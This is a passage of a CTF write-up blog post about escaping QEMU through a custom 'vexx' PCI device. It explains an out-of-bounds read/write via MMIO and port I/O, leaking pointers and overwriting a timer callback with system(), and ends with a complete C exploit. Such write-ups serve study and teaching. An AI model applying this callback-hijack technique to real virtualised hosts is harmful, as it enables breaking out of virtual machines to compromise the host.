<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Talking-to-mmio"><a href="#Talking-to-mmio" class="headerlink" title="Talking to mmio"></a>Talking to mmio</h3><p>The first step is to find a way to talking to the device and make it invokes vulnerable functions. <a href="https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html" target="_blank" rel="noopener">Hitb 2017 - Babyqemu</a> shows how to locate the mmio file in details.<br>As for this challenge, we can identify two mmio file according to the size.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">-rw------- 1 root root 16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]</span><br><span class="line">-rw------- 1 root root 4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0  [vexx-mmio]</span><br></pre></td></tr></table></figure></p>
<p>Then we can setup the mmio from userspace:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fdcmb =  open(<span class="string">"/sys/devices/pci0000:00/0000:00:04.0/resource1"</span>, O_RDWR|O_SYNC);</span><br><span class="line"><span class="keyword">void</span> * cmb =  mmap(<span class="literal">NULL</span>, <span class="number">0x4000</span>, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, <span class="number">0</span>);</span><br></pre></td></tr></table></figure></p>
<p>If we setup a breakpoint at <code>vexx_cmb_write</code>, and copy some data to <code>cmb</code>, we can see the breakpoint is hitted.</p>
<h3 id="Talking-to-port-I-O"><a href="#Talking-to-port-I-O" class="headerlink" title="Talking to port I/O"></a>Talking to port I/O</h3><p>The previous writeups didn’t cover the knowledge about how to talk to the port I/O. So I spent some time to figure out it by myself. <a href="https://www.tldp.org/HOWTO/IO-Port-Programming-2.html" target="_blank" rel="noopener">Using I/O ports in C programs</a> introduce that we can access the I/O port by <code>inb(port)</code> and <code>outb(value, port)</code>. Before that, we also need to setup the permission by <code>ioperm()</code>.<br>The question for us now is what is the io number? From <code>pci_vexx_realize</code>, it gives us some hits like:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">portio_list_init(&amp;state-&gt;port_list, &amp;state-&gt;pdev.qdev.parent_obj, vexx_port_list, state, <span class="string">"vexx"</span>);</span><br><span class="line">v3 = pci_address_space_io(pdev);</span><br><span class="line">portio_list_add(&amp;state-&gt;port_list, v3, <span class="number">0x230</span>u);</span><br></pre></td></tr></table></figure></p>
<p>It seems that it start from 0x230, and <code>vexx_ioport_write</code>is      where we can comfirm our guess:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_ioport_write</span><span class="params">(VexxState *opaque, <span class="keyword">uint32_t</span> addr, <span class="keyword">uint32_t</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( addr - <span class="number">560</span> &lt;= <span class="number">0x20</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">switch</span> ( addr )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x240</span>u:</span><br><span class="line">        opaque-&gt;req.offset = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x250</span>u:</span><br><span class="line">        opaque-&gt;req.state = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x230</span>u:</span><br><span class="line">        opaque-&gt;memorymode = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>Port number 0x230 for accessing <code>memorymode</code>, and 0x240 for <code>req.offset</code>. That all we need to perform a OOB R/W.</p>
<h3 id="Leaking-amp-Hijacking"><a href="#Leaking-amp-Hijacking" class="headerlink" title="Leaking &amp; Hijacking"></a>Leaking &amp; Hijacking</h3><p>With the OOB ability, we need to comfirm its impact, that is, take a look at what we can leak or overwrite from the object. We can set a breakpoint at <code>veex_cmb_mmio</code>, and see how the <code>VeexState</code> object looks like using the command <code>p *(VexxState *) $rdi</code> ,as <code>$rdi</code> points to the object itself now.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p *(VexxState *) $rdi</span><br><span class="line">$<span class="number">1</span> = &#123;</span><br><span class="line">  pdev = &#123;</span><br><span class="line">    qdev = &#123;</span><br><span class="line">      parent_obj = &#123;</span><br><span class="line">        class = <span class="number">0x564be72500f0</span>,</span><br><span class="line">        <span class="built_in">free</span> = <span class="number">0x7f0cc7e56ba0</span> &lt;g_free&gt;,</span><br><span class="line">        properties = <span class="number">0x564be7f07f60</span>,</span><br><span class="line">        ref = <span class="number">23</span>,</span><br><span class="line">        parent = <span class="number">0x564be727f200</span></span><br><span class="line">      &#125;,</span><br><span class="line">  ......</span><br><span class="line">  ......</span><br><span class="line">  ......</span><br><span class="line">  irq_status = <span class="number">0</span>,</span><br><span class="line">  memorymode = <span class="number">4</span>,</span><br><span class="line">  req = &#123;</span><br><span class="line">    state = <span class="number">0</span>,</span><br><span class="line">    offset = <span class="number">0</span>,</span><br><span class="line">    req_buf = '\000' &lt;repeats 255 times&gt; [!!OOB HAPPEN HERE!!]</span><br><span class="line">  &#125;,</span><br><span class="line">  vexxdma = &#123;</span><br><span class="line">    state = <span class="number">0</span>,</span><br><span class="line">    dma = &#123;</span><br><span class="line">      src = <span class="number">0</span>,</span><br><span class="line">      dst = <span class="number">0</span>,</span><br><span class="line">      cnt = <span class="number">0</span>,</span><br><span class="line">      cmd = <span class="number">0</span></span><br><span class="line">    &#125;,</span><br><span class="line">    dma_timer = &#123;</span><br><span class="line">      expire_time = <span class="number">-1</span>,</span><br><span class="line">      timer_list = <span class="number">0x564be7256e10</span>,</span><br><span class="line">      cb = <span class="number">0x564be4e69f10</span> &lt;vexx_dma_timer&gt;,</span><br><span class="line">      opaque = <span class="number">0x564be7f292c0</span>,</span><br><span class="line">      next = <span class="number">0x0</span>,</span><br><span class="line">      attributes = <span class="number">0</span>,</span><br><span class="line">      scale = <span class="number">1000000</span></span><br><span class="line">    &#125;,</span><br><span class="line">    dma_buf = '\000' &lt;repeats 4095 times&gt;,</span><br><span class="line">    dma_mask = <span class="number">268435455</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>Once printed out the structure, it becomes very clear. We can leak the code address from <code>dma_timer.cb</code>, it points to the address of <code>vexx_dma_timer</code>, and there is a heap address at <code>dma_timer.opaque</code>, it happens to point to the <code>VexxState</code> object itself.</p>
<p>Of course we can overwrite these two pointers, the <code>dma_timer.cb</code> seems will be triggered by some kind of timing mechanism. After some investigation, I found that the <code>cb</code> function can be triggered indirectly by a special command in <code>vexx_mmio_write</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_mmio_write</span><span class="params">(VexxState *vexx, hwaddr addr, <span class="keyword">uint64_t</span> val, <span class="keyword">unsigned</span> <span class="keyword">int</span> size)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">   ......</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( addr == <span class="number">0x98</span> &amp;&amp; val &amp; <span class="number">1</span> &amp;&amp; !(vexx-&gt;vexxdma.dma.cmd &amp; <span class="number">1</span>) )</span><br><span class="line">    &#123;</span><br><span class="line">      vexx-&gt;vexxdma.dma.cmd = val;</span><br><span class="line">      v8 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);</span><br><span class="line">      timer_mod(</span><br><span class="line">        &amp;vexx-&gt;vexxdma.dma_timer,</span><br><span class="line">        ((<span class="keyword">signed</span> __int64)((<span class="keyword">unsigned</span> __int128)(<span class="number">0x431BDE82D7B634DB</span>LL * (<span class="keyword">signed</span> __int128)v8) &gt;&gt; <span class="number">64</span>) &gt;&gt; <span class="number">18</span>)</span><br><span class="line">      - (v8 &gt;&gt; <span class="number">63</span>)</span><br><span class="line">      + <span class="number">100</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>The <code>vexx_mmio_write</code> will register an event to the timer instead of writing the value right away. And when the time’s up, it will call <code>dma_timer.cb</code>, the first argument is <code>dma_timer.opaque</code>. Therefore, we can use OOB to write <code>dma_timer.cb</code> to <code>system@plt</code>, and <code>dma_time.opaque</code> points to <code>&quot;/bin/sh&quot;</code>. When the timer is triggered, it can give us a shell! Well, after some trying <code>system(&quot;/bin/sh&quot;);</code> does not work as the emulator just hang there, but we can instead use <code>system(&quot;cat flag&quot;)</code> to obtain the glory flag!</p>
<h2 id="Exp"><a href="#Exp" class="headerlink" title="Exp"></a>Exp</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;dirent.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;time.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;signal.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/auxv.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/prctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/uio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sched.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/io.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PORT_MEMORYMODE 0X230</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PORT_OFFSET 0X240</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> PORT_STATE 0x250</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// -rw-------    1 root     root         16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]</span></span><br><span class="line"><span class="comment">// -rw-------    1 root     root          4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0 [vexx-mmio]</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span>* cmb;</span><br><span class="line"><span class="keyword">char</span>* mmio;</span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> leak_code = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> leak_heap = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> code = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> cmd_str = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">die</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span>* msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    perror(msg);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">cmbwrite</span><span class="params">(<span class="keyword">uint64_t</span> addr, <span class="keyword">uint64_t</span> value)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    *((<span class="keyword">uint64_t</span>*)(cmb + addr)) = value;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">uint64_t</span> cmbread(<span class="keyword">uint64_t</span> addr)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">return</span> *((<span class="keyword">uint64_t</span>*)(cmb+ addr));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">do_leak</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">//0x55fa155ecf10 (vexx_dma_timer) at req_buf[0x138]</span></span><br><span class="line">    <span class="built_in">strcpy</span>(cmb, <span class="string">"/bin/cat flag\x00"</span>);</span><br><span class="line">    outb(<span class="number">0xf0</span>, PORT_OFFSET);</span><br><span class="line">    outb(<span class="number">0x1</span>, PORT_MEMORYMODE);</span><br><span class="line">    leak_code = cmbread(<span class="number">0x138</span><span class="number">-0xf0</span>); <span class="comment">// cb = vexx_dma_timer</span></span><br><span class="line">    leak_heap = cmbread(<span class="number">0x140</span><span class="number">-0xf0</span>); <span class="comment">// opaque = state</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">hijack</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">size_t</span> system = code + <span class="number">0x2ab860</span>;</span><br><span class="line">    cmbwrite(<span class="number">0x138</span><span class="number">-0xf0</span>, system); <span class="comment">// rip ;</span></span><br><span class="line">    cmbwrite(<span class="number">0x140</span><span class="number">-0xf0</span>, cmd_str); <span class="comment">// rdi ;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">trigger</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    *((<span class="keyword">int32_t</span>*)(mmio + <span class="number">0x98</span>)) = <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>&#123;</span><br><span class="line"> 	(<span class="keyword">void</span>)argc; (<span class="keyword">void</span>)argv;</span><br><span class="line">    <span class="keyword">int</span> res = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">int</span> fdcmb = open(<span class="string">"/sys/devices/pci0000:00/0000:00:04.0/resource1"</span>, O_RDWR|O_SYNC);</span><br><span class="line">    <span class="keyword">if</span> (fdcmb &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        die(<span class="string">"fdcmb open"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    cmb = mmap(<span class="literal">NULL</span>, <span class="number">0x4000</span>, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (cmb == MAP_FAILED) &#123;</span><br><span class="line">        die(<span class="string">"cmb"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">int</span> fdmmio = open(<span class="string">"/sys/devices/pci0000:00/0000:00:04.0/resource0"</span>, O_RDWR|O_SYNC);</span><br><span class="line">    <span class="keyword">if</span> (fdmmio &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        die(<span class="string">"fdmmio open"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    mmio = mmap(<span class="literal">NULL</span>, <span class="number">0x1000</span>, PROT_READ | PROT_WRITE, MAP_SHARED, fdmmio, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (mmio == MAP_FAILED) &#123;</span><br><span class="line">        die(<span class="string">"mmio"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    res = ioperm(<span class="number">0x230</span>, <span class="number">0x30</span>, <span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span> (res &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        die(<span class="string">"ioperm"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    do_leak();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"leak code: 0x%lx\n"</span>, leak_code);</span><br><span class="line">    code = leak_code<span class="number">-0x4dcf10</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"code: 0x%lx\n"</span>, code);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"leak heap: 0x%lx\n"</span>, leak_heap);</span><br><span class="line">    cmd_str = leak_heap + <span class="number">0xb90</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"cmd: 0x%lx\n"</span>, cmd_str);</span><br><span class="line"></span><br><span class="line">    hijack();</span><br><span class="line">    trigger();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Wrapup"><a href="#Wrapup" class="headerlink" title="Wrapup"></a>Wrapup</h2><p>This challenge is not as difficult as it looks. Qemu escape sounds scary, but the vulnerability logic is simple and exploitation is kind of straight-forward. Just require some patient and confident! From this challenge, I learned how to access the low-level devices from the userspace with mmio or port-io. I think building the exploit from these communication channels is the general pattern of VM-escape style CTF challenge.</p>
<h2 id="References"><a href="#References" class="headerlink" title="References"></a>References</h2><ol>
<li><a href="https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html" target="_blank" rel="noopener">https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html</a></li>
<li><a href="https://kitctf.de/writeups/hitb2017/babyqemu" target="_blank" rel="noopener">https://kitctf.de/writeups/hitb2017/babyqemu</a></li>
<li><a href="https://bbs.pediy.com/thread-252385.htm" target="_blank" rel="noopener">https://bbs.pediy.com/thread-252385.htm</a></li>
<li><a href="https://blog.eadom.net/writeups/qemu-escape-vm-escape-from-0ctf-2017-finals-writeup/" target="_blank" rel="noopener">https://blog.eadom.net/writeups/qemu-escape-vm-escape-from-0ctf-2017-finals-writeup/</a></li>
<li><a href="https://dangokyo.me/2018/03/25/hitb-xctf-2017-babyqemu-write-up/" target="_blank" rel="noopener">https://dangokyo.me/2018/03/25/hitb-xctf-2017-babyqemu-write-up/</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/06/De1CTF2019-mimic-note/" rel="next" title="[De1CTF2019] mimic_note">
                <i class="fa fa-chevron-left"></i> [De1CTF2019] mimic_note
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/09/01/银河帝国十二部曲/" rel="prev" title="银河帝国十二部曲">
                银河帝国十二部曲 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Matthew Shao">
          <p class="site-author-name" itemprop="name">Matthew Shao</p>
          <p class="site-description motion-element" itemprop="description">放弃幻想 准备战斗</p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">60</span>
                <span class="site-state-item-name">文章</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分類</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">標籤</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/MatthewShao" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  Github
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Recon"><span class="nav-number">1.</span> <span class="nav-text">Recon</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Vulnerabilites"><span class="nav-number">2.</span> <span class="nav-text">Vulnerabilites</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#cmb-mmio"><span class="nav-number">2.1.</span> <span class="nav-text">cmb_mmio</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Port-I-O"><span class="nav-number">2.2.</span> <span class="nav-text">Port I/O</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Debugging-setup"><span class="nav-number">3.</span> <span class="nav-text">Debugging setup</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploitation"><span class="nav-number">4.</span> <span class="nav-text">Exploitation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Talking-to-mmio"><span class="nav-number">4.1.</span> <span class="nav-text">Talking to mmio</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Talking-to-port-I-O"><span class="nav-number">4.2.</span> <span class="nav-text">Talking to port I/O</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Leaking-amp-Hijacking"><span class="nav-number">4.3.</span> <span class="nav-text">Leaking &amp; Hijacking</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exp"><span class="nav-number">5.</span> <span class="nav-text">Exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wrapup"><span class="nav-number">6.</span> <span class="nav-text">Wrapup</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#References"><span class="nav-number">7.</span> <span class="nav-text">References</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Matthew Shao</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 強力驅動
</div>

<div class="theme-info">
  主題 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Logos
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/schemes/logos.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
